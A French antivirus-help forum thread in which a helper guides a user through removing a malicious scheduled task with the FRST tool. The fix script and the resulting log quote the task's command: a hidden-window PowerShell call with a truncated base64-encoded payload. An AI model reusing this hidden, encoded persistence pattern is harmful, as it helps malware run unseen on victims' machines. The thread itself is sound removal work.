Alerte Avast Powershell.exe (suspicion malware)

Questions générales (installation, utilisation etc) sur les antivirus.

Modérateur : Mods Windows

Drekinn
Messages : 3
Inscription : 31 mars 2022 23:42

Alerte Avast Powershell.exe (suspicion malware)

par Drekinn »

Bonjour,

Depuis quelques temps Avast m'envoie des alertes de sécurité concernant Powershell.exe

J'ai suivis le tuto FRST et voici les diagnostiques

Addition: https://pjjoint.malekal.com/files.php?i ... d7c8d15f10
FRST: https://pjjoint.malekal.com/files.php?i ... l13o10m8l5
Shortcut: https://pjjoint.malekal.com/files.php?i ... 5j15w14s14

Merci de prendre le temps de m'aider =)
Vous ne pouvez pas consulter les pièces jointes insérées à ce message.
Malekal_morte
Messages : 116318
Inscription : 10 sept. 2005 13:57

Re: Alerte Avast Powershell.exe (suspicion malware)

par Malekal_morte »

Bonsoir,

Voici la correction à effectuer avec FRST. Tu peux t'aider de cette Voici la correction à effectuer avec FRST. Tu peux t'aider de cette #fix note explicative avec des captures d'écran.
Relance FRST puis sur ton clavier appuyer sur la touche CTRL + Y.
Le bloc-note va s'ouvrir, copie/colle ceci.

Code : Tout sélectionner

Start:
CloseProcesses:
CreateRestorePoint:
Task: {466A834F-8CAC-4E18-BAC0-E8AC089BDD18} - System32\Tasks\chrome tele => cmd /c powershell -WindowStyle Hidden -E "JAB2ACAAPQAgACIAMAAiADsACgAkAGwAdgAgAD0AIAAiADMAIgA7AAoAJABkACAAPQAgACIAdABjAGEAdQBrAHQAaAB3AC4AYwBvAG0AIgA7AAoAJABlAHAAIAA9ACAAIgBXAHkASQAxAE0AagBVADAATwBUAE0AegBNAEQAZwAzAE4AVABnADMATQBqAEEAMQBPAEMASQBzAE0AVABZADAATgBqAE0AMgBNAEQARQAzAE4AMQAwAD0AIgA7AAoACgAkAH (l'élément de données a 4539 caractères en plus). <==== ATTENTION
Reboot:
End:
Ferme le bloc-note, retourne sur FRST et clique sur le bouton "Corriger / Fix"
Un redémarrage sera peut-être nécessaire et automatique.
Un fichier texte apparaît, copie/colle le contenu ici dans un nouveau message.

Redémarre l'ordinateur.
(L'ordinateur peut redémarrer tout seul, si le rapport de correction ne s'ouvre pas, cherche un fichier fixlog.txt qui se trouve dans le même dossier que FRST)
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Drekinn
Messages : 3
Inscription : 31 mars 2022 23:42

Re: Alerte Avast Powershell.exe (suspicion malware)

par Drekinn »

Code : Tout sélectionner

Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 28-03-2022
Exécuté par chris (01-04-2022 00:10:53) Run:1
Exécuté depuis C:\Users\chris\Desktop
Profils chargés: chris
Mode d'amorçage: Normal
==============================================

fixlist contenu:
*****************
Start:
CloseProcesses:
CreateRestorePoint:
Task: {466A834F-8CAC-4E18-BAC0-E8AC089BDD18} - System32\Tasks\chrome tele => cmd /c powershell -WindowStyle Hidden -E "JAB2ACAAPQAgACIAMAAiADsACgAkAGwAdgAgAD0AIAAiADMAIgA7AAoAJABkACAAPQAgACIAdABjAGEAdQBrAHQAaAB3AC4AYwBvAG0AIgA7AAoAJABlAHAAIAA9ACAAIgBXAHkASQAxAE0AagBVADAATwBUAE0AegBNAEQAZwAzAE4AVABnADMATQBqAEEAMQBPAEMASQBzAE0AVABZADAATgBqAE0AMgBNAEQARQAzAE4AMQAwAD0AIgA7AAoACgAkAH (l'élément de données a 4539 caractères en plus). <==== ATTENTION
Reboot:
End:
*****************

Processus fermé avec succès.
Le Point de restauration a été créé avec succès.
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{466A834F-8CAC-4E18-BAC0-E8AC089BDD18}" => supprimé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{466A834F-8CAC-4E18-BAC0-E8AC089BDD18}" => supprimé(es) avec succès
C:\WINDOWS\System32\Tasks\chrome tele => déplacé(es) avec succès
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\chrome tele" => supprimé(es) avec succès


Le système a dû redémarrer.

==== Fin de Fixlog 00:11:24 ====
Malekal_morte
Messages : 116318
Inscription : 10 sept. 2005 13:57

Re: Alerte Avast Powershell.exe (suspicion malware)

par Malekal_morte »

ok vois si les alertes PowerShell d'Avast! s'arretent.
Première règle élémentaire de sécurité : on réfléchit puis on clic et pas l'inverse - Les fichiers/programmes c'est comme les bonbons, quand ça vient d'un inconnu, on n'accepte pas !
Comment protéger son PC des virus
Windows 11 : Compatibilité, Configuration minimale requise, télécharger ISO et installer Windows 11

Comment demander de l'aide sur le forum
Partagez malekal.com : n'hésitez pas à partager les articles qui vous plaisent sur la page Facebook du site.
Drekinn
Messages : 3
Inscription : 31 mars 2022 23:42

Re: Alerte Avast Powershell.exe (suspicion malware)

par Drekinn »

Entendu, je reviendrai vers vous si les problèmes persistent.

Si ce n'était pas le cas je me permet de vous remercier pour votre aide immédiate mais également pour tous les tutos sécurités/utilisations windows que je dévore depuis 48h, un travail de titan qui mérite de sincère louanges!

Prenez soin de vous, en espérant clore ce topic rapidement ;)
  • Sujets similaires
    Réponses
    Vues
    Dernier message

Revenir à « Discussions/Aides Antivirus »